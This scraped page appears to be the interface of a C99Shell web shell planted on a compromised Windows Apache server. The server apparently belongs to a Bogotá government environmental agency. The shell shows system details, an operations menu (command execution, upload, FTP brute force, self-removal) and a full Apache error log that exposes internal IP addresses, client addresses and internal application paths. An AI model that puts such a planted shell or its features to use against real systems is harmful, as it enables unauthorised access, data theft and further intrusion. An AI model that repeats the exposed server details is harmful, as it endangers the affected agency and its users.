!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.33 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2016.12.08.log (27.8 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Thu Dec 08 01:07:24.132684 2016] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Dec 08 01:12:23.107209 2016] [core:error] [pid 7252:tid 13864] (20024)The given path is misformatted or contained invalid characters: [client 157.55.39.135:19696] AH00127: Cannot map GET /... HTTP/1.1 to file
[Thu Dec 08 02:52:22.957748 2016] [proxy:error] [pid 7252:tid 14192] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Thu Dec 08 02:52:22.957748 2016] [proxy:error] [pid 7252:tid 14192] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Thu Dec 08 02:52:22.957748 2016] [proxy_http:error] [pid 7252:tid 14192] [client 152.61.128.50:39402] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Thu Dec 08 02:52:23.144948 2016] [proxy:error] [pid 7252:tid 14192] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Dec 08 02:52:23.316548 2016] [proxy:error] [pid 7252:tid 14192] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Dec 08 07:02:41.733127 2016] [proxy:error] [pid 7252:tid 13244] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.32:80 (172.22.1.32) failed
[Thu Dec 08 07:02:41.733127 2016] [proxy:error] [pid 7252:tid 13244] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.32) for 60s
[Thu Dec 08 07:02:41.733127 2016] [proxy_http:error] [pid 7252:tid 13244] [client 181.142.197.221:53038] AH01114: HTTP: failed to make connection to backend: 172.22.1.32, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Thu Dec 08 07:11:18.016034 2016] [proxy_http:error] [pid 7252:tid 13584] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 135.19.198.185:57686] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Thu Dec 08 07:13:29.992265 2016] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Dec 08 08:19:55.285465 2016] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Dec 08 09:33:46.584449 2016] [proxy_http:error] [pid 7252:tid 13528] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:11206] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Dec 08 09:33:46.584449 2016] [proxy:error] [pid 7252:tid 13528] [client 201.245.192.253:11206] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Dec 08 10:47:37.788832 2016] [proxy_http:error] [pid 7252:tid 13340] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19747] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Thu Dec 08 10:47:37.788832 2016] [proxy:error] [pid 7252:tid 13340] [client 201.245.192.253:19747] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Thu Dec 08 10:47:40.284836 2016] [proxy_http:error] [pid 7252:tid 12924] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19746] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Thu Dec 08 12:00:27.560307 2016] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Dec 08 12:24:28.411038 2016] [core:error] [pid 7252:tid 13400] (20024)The given path is misformatted or contained invalid characters: [client 54.91.133.170:36016] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Thu Dec 08 13:05:35.960972 2016] [core:error] [pid 7252:tid 13604] (22)Invalid argument: [client 186.30.45.73:15275] AH00127: Cannot map GET /galeria/nivo-slider/demo/images/bannerinvitaci\xf3nacaminatasecologicas2.jpg HTTP/1.1 to file, referer: http://190.27.245.106/galeria/nivo-slider/demo/demo.html
[Thu Dec 08 13:10:49.631723 2016] [core:error] [pid 7252:tid 13284] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.187:4920] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Thu Dec 08 13:26:28.160571 2016] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Dec 08 13:36:19.339209 2016] [proxy_http:error] [pid 7252:tid 13116] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.156.38.113:49343] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=32
[Thu Dec 08 13:36:19.339209 2016] [proxy:error] [pid 7252:tid 13116] [client 190.156.38.113:49343] AH00898: Error reading from remote server returned by /isolucionsda/Menu.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=32
[Thu Dec 08 13:36:21.850814 2016] [proxy_http:error] [pid 7252:tid 13848] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.156.38.113:49341] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=MagazinHome.asp
[Thu Dec 08 13:42:45.268287 2016] [core:error] [pid 7252:tid 13892] (20024)The given path is misformatted or contained invalid characters: [client 40.77.167.77:20766] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Thu Dec 08 13:52:33.248920 2016] [proxy_http:error] [pid 7252:tid 13848] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.156.38.113:49519] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Administracion/../riesgosdafp/riesgoanalisis.asp
[Thu Dec 08 14:02:12.212737 2016] [proxy_http:error] [pid 7252:tid 13424] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 181.128.239.240:10177] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/SFPlugIn.aspx?number=27336&url=controldeinicio.asp?ainicio=consultarprograma%3C%3Euinicio=AAMA%3C%3Ecinicio=%3C%3EPrograma=bancoconocimiento/V/Validacionparticipantesdeaccionesdeeducacionambiental_v1/Validacionparticipantesdeaccionesdeeducacionambiental_v1.asp%3C%3Eamp;idarticulo=10408%3C%3Eamp;debug=yes%3C%3EidPrj=20499&uname=AAMA
[Thu Dec 08 14:02:12.212737 2016] [proxy:error] [pid 7252:tid 13424] [client 181.128.239.240:10177] AH00898: Error reading from remote server returned by /isolucionsda/bancoconocimiento/V/Validacionparticipantesdeaccionesdeeducacionambiental_v1/126pm01-pr10-m-2 validacion participantes de acciones de educacion ambiental00.xls, referer: http://190.27.245.106/isolucionsda/SFPlugIn.aspx?number=27336&url=controldeinicio.asp?ainicio=consultarprograma%3C%3Euinicio=AAMA%3C%3Ecinicio=%3C%3EPrograma=bancoconocimiento/V/Validacionparticipantesdeaccionesdeeducacionambiental_v1/Validacionparticipantesdeaccionesdeeducacionambiental_v1.asp%3C%3Eamp;idarticulo=10408%3C%3Eamp;debug=yes%3C%3EidPrj=20499&uname=AAMA
[Thu Dec 08 14:07:59.953948 2016] [proxy_http:error] [pid 7252:tid 13108] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.156.38.113:49557] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Administracion/../riesgosdafp/riesgoanalisis.asp
[Thu Dec 08 14:08:00.531149 2016] [proxy_http:error] [pid 7252:tid 12900] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.156.38.113:49560] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Administracion/../riesgosdafp/riesgoanalisis.asp
[Thu Dec 08 14:12:28.305619 2016] [proxy_http:error] [pid 7252:tid 13244] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.156.38.113:49573] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/riesgosdafp/riesgoidentificacion.asp?Pagina=Administracion/../riesgosdafp/riesgoidentificacion.asp
[Thu Dec 08 14:14:17.131410 2016] [proxy_http:error] [pid 7252:tid 13496] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.156.38.113:49581] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Administracion/../riesgosdafp/riesgoanalisis.asp
[Thu Dec 08 14:14:17.147010 2016] [proxy_http:error] [pid 7252:tid 13892] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.156.38.113:49578] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Administracion/../riesgosdafp/riesgoanalisis.asp
[Thu Dec 08 15:09:59.656681 2016] [proxy_http:error] [pid 7252:tid 12868] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19438] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Dec 08 15:09:59.656681 2016] [proxy:error] [pid 7252:tid 12868] [client 201.245.192.253:19438] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Dec 08 15:09:59.672281 2016] [proxy_http:error] [pid 7252:tid 12840] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19439] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Dec 08 15:09:59.672281 2016] [proxy:error] [pid 7252:tid 12840] [client 201.245.192.253:19439] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Dec 08 15:16:43.822191 2016] [proxy_http:error] [pid 7252:tid 13028] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19988] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10165
[Thu Dec 08 15:16:43.822191 2016] [proxy:error] [pid 7252:tid 13028] [client 201.245.192.253:19988] AH00898: Error reading from remote server returned by /isolucionsda/Administracion/SalaEdicion/g/GifTransparente.gif, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10165
[Thu Dec 08 15:21:23.312282 2016] [proxy_http:error] [pid 7252:tid 13480] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:20447] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=15
[Thu Dec 08 15:21:23.312282 2016] [proxy:error] [pid 7252:tid 13480] [client 201.245.192.253:20447] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=15
[Thu Dec 08 15:34:25.716056 2016] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Dec 08 15:36:21.546260 2016] [proxy_http:error] [pid 7252:tid 13496] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:21506] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10393
[Thu Dec 08 15:36:21.546260 2016] [proxy:error] [pid 7252:tid 13496] [client 201.245.192.253:21506] AH00898: Error reading from remote server returned by /isolucionsda/Administracion/SalaEdicion/g/GifTransparente.gif, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10393
[Thu Dec 08 15:45:33.256829 2016] [proxy_http:error] [pid 7252:tid 13892] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22121] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/ArticuloMenu.asp
[Thu Dec 08 15:45:33.256829 2016] [proxy:error] [pid 7252:tid 13892] [client 201.245.192.253:22121] AH00898: Error reading from remote server returned by /isolucionsda/Administracion/SalaEdicion/ArticuloMenu.asp, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/ArticuloMenu.asp
[Thu Dec 08 16:01:23.252697 2016] [proxy_http:error] [pid 7252:tid 12708] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10948] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Session.asp
[Thu Dec 08 16:01:23.252697 2016] [proxy:error] [pid 7252:tid 12708] [client 201.245.192.253:10948] AH00898: Error reading from remote server returned by /isolucionsda/SesionNeutra.asp, referer: http://190.27.245.106/isolucionsda/Session.asp
[Thu Dec 08 16:44:05.993998 2016] [proxy_http:error] [pid 7252:tid 13284] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.157.72.126:49536] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Dec 08 16:44:05.993998 2016] [proxy:error] [pid 7252:tid 13284] [client 190.157.72.126:49536] AH00898: Error reading from remote server returned by /isolucionsda/g/Bot_Ayuda.jpg, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Dec 08 17:11:19.676668 2016] [core:error] [pid 7252:tid 13276] (20024)The given path is misformatted or contained invalid characters: [client 54.145.167.111:13119] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Thu Dec 08 17:14:10.231767 2016] [proxy_http:error] [pid 7252:tid 13892] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.145.174.63:57896] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Dec 08 17:14:10.231767 2016] [proxy:error] [pid 7252:tid 13892] [client 186.145.174.63:57896] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Dec 08 17:14:11.089769 2016] [proxy_http:error] [pid 7252:tid 13276] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.145.174.63:57895] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Dec 08 17:14:14.911776 2016] [proxy_http:error] [pid 7252:tid 13328] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.145.174.63:57899] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Dec 08 17:14:14.911776 2016] [proxy:error] [pid 7252:tid 13328] [client 186.145.174.63:57899] AH00898: Error reading from remote server returned by /isolucionsda/Logout.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Dec 08 17:33:04.260159 2016] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Dec 08 18:49:55.162258 2016] [core:error] [pid 7252:tid 12884] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.187:8088] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Thu Dec 08 19:46:39.323237 2016] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Dec 08 19:46:47.794052 2016] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Dec 08 19:47:05.656083 2016] [core:error] [pid 7252:tid 13284] [client 66.240.236.119:38117] AH00135: Invalid method in request quit
[Thu Dec 08 21:38:46.852654 2016] [core:error] [pid 7252:tid 12708] (22)Invalid argument: [client 186.29.53.234:10269] AH00127: Cannot map GET /galeria/nivo-slider/demo/images/bannerinvitaci\xf3nacaminatasecologicas2.jpg HTTP/1.1 to file, referer: http://190.27.245.106/galeria/nivo-slider/demo/demo.html
[Thu Dec 08 22:09:25.690283 2016] [proxy_http:error] [pid 7252:tid 13744] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:12164] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Thu Dec 08 22:09:25.690283 2016] [proxy:error] [pid 7252:tid 13744] [client 186.29.53.234:12164] AH00898: Error reading from remote server returned by /isolucionsda/g/Bot_MejoramientoOver_ESP.jpg, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Thu Dec 08 22:13:00.143860 2016] [proxy_http:error] [pid 7252:tid 13864] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:12252] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Thu Dec 08 22:13:00.143860 2016] [proxy:error] [pid 7252:tid 13864] [client 186.29.53.234:12252] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Thu Dec 08 22:45:02.193036 2016] [proxy_http:error] [pid 7252:tid 13496] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:13716] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/NoPrevencion.asp?CodTipoAccPrev=1&Codsucursal=&Accion=Consultar&Id_AccionPreventiva=282
[Thu Dec 08 22:45:02.193036 2016] [proxy:error] [pid 7252:tid 13496] [client 186.29.53.234:13716] AH00898: Error reading from remote server returned by /ISOlucionSDA/BancoAnexo/AccionPreventiva/SeguimientoPlan/282/282/plan de trabajo-soratama 2016 i0.pdf, referer: http://190.27.245.106/isolucionsda/NoPrevencion.asp?CodTipoAccPrev=1&Codsucursal=&Accion=Consultar&Id_AccionPreventiva=282
[Thu Dec 08 22:45:04.236639 2016] [proxy_http:error] [pid 7252:tid 12980] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:13713] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=RiesgosDafp/RiesgoMapa.asp
[Thu Dec 08 22:54:34.105640 2016] [proxy_http:error] [pid 7252:tid 13592] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:14126] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=RiesgosDafp/ListadoDofa.asp
[Thu Dec 08 22:54:34.105640 2016] [proxy:error] [pid 7252:tid 13592] [client 186.29.53.234:14126] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=RiesgosDafp/ListadoDofa.asp
[Thu Dec 08 22:54:34.136840 2016] [proxy_http:error] [pid 7252:tid 13824] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:14128] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=RiesgosDafp/ListadoDofa.asp
[Thu Dec 08 22:54:34.136840 2016] [proxy:error] [pid 7252:tid 13824] [client 186.29.53.234:14128] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=RiesgosDafp/ListadoDofa.asp
[Thu Dec 08 22:57:00.309097 2016] [proxy_http:error] [pid 7252:tid 13864] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:14238] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=RiesgosDafp/RiesgoMapa.asp
[Thu Dec 08 22:57:00.309097 2016] [proxy:error] [pid 7252:tid 13864] [client 186.29.53.234:14238] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=RiesgosDafp/RiesgoMapa.asp
[Thu Dec 08 22:59:38.446575 2016] [proxy_http:error] [pid 7252:tid 13688] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:14336] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Thu Dec 08 22:59:38.446575 2016] [proxy:error] [pid 7252:tid 13688] [client 186.29.53.234:14336] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Thu Dec 08 23:02:58.719727 2016] [proxy_http:error] [pid 7252:tid 13192] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:14426] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FramesetArticulo.asp?Pagina=bancoconocimiento%2FR%2FRevisionporlaDireccion2016%2D1%2FRevisionporlaDireccion2016%2D1%2Easp&IdArticulo=10052&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Thu Dec 08 23:10:25.504511 2016] [proxy_http:error] [pid 7252:tid 12900] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:14594] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FramesetArticulo.asp?Pagina=bancoconocimiento%2FM%2FMATRIZIDENTIFICACIONDEASPECTOSYEVALUACIONDEIMPACTOSAMBIENTALES2016%2DII%2FMATRIZIDENTIFICACIONDEASPECTOSYEVALUACIONDEIMPACTOSAMBIENTALES2016%2DII%2Easp&IdArticulo=10111&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Thu Dec 08 23:10:25.504511 2016] [proxy:error] [pid 7252:tid 12900] [client 186.29.53.234:14594] AH00898: Error reading from remote server returned by /isolucionsda/bancoconocimiento/M/MATRIZIDENTIFICACIONDEASPECTOSYEVALUACIONDEIMPACTOSAMBIENTALES2016-II/MATRIZIDENTIFICACIONDEASPECTOSYEVALUACIONDEIMPACTOSAMBIENTALES2016-II.asp, referer: http://190.27.245.106/isolucionsda/FramesetArticulo.asp?Pagina=bancoconocimiento%2FM%2FMATRIZIDENTIFICACIONDEASPECTOSYEVALUACIONDEIMPACTOSAMBIENTALES2016%2DII%2FMATRIZIDENTIFICACIONDEASPECTOSYEVALUACIONDEIMPACTOSAMBIENTALES2016%2DII%2Easp&IdArticulo=10111&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Thu Dec 08 23:40:04.080235 2016] [proxy_http:error] [pid 7252:tid 13384] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:15493] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Thu Dec 08 23:40:04.080235 2016] [proxy:error] [pid 7252:tid 13384] [client 186.29.53.234:15493] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Thu Dec 08 23:56:43.527191 2016] [core:error] [pid 7252:tid 12708] (20024)The given path is misformatted or contained invalid characters: [client 52.87.158.134:26621] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Thu Dec 08 23:56:48.768800 2016] [proxy_http:error] [pid 7252:tid 13244] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:15688] AH01102: error reading status line from remote server 172.22.1.31:80
[Thu Dec 08 23:56:48.768800 2016] [proxy:error] [pid 7252:tid 13244] [client 186.29.53.234:15688] AH00898: Error reading from remote server returned by /isolucionsda/Session.asp
[Thu Dec 08 23:58:24.958569 2016] [proxy_http:error] [pid 7252:tid 12800] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:15707] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=32
[Thu Dec 08 23:58:24.958569 2016] [proxy:error] [pid 7252:tid 12800] [client 186.29.53.234:15707] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=32
[Thu Dec 08 23:58:28.530975 2016] [proxy_http:error] [pid 7252:tid 13392] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.53.234:15710] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=RiesgosDafp/RiesgoMapa.asp
[Thu Dec 08 23:58:28.530975 2016] [proxy:error] [pid 7252:tid 13392] [client 186.29.53.234:15710] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=RiesgosDafp/RiesgoMapa.asp

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0936 ]--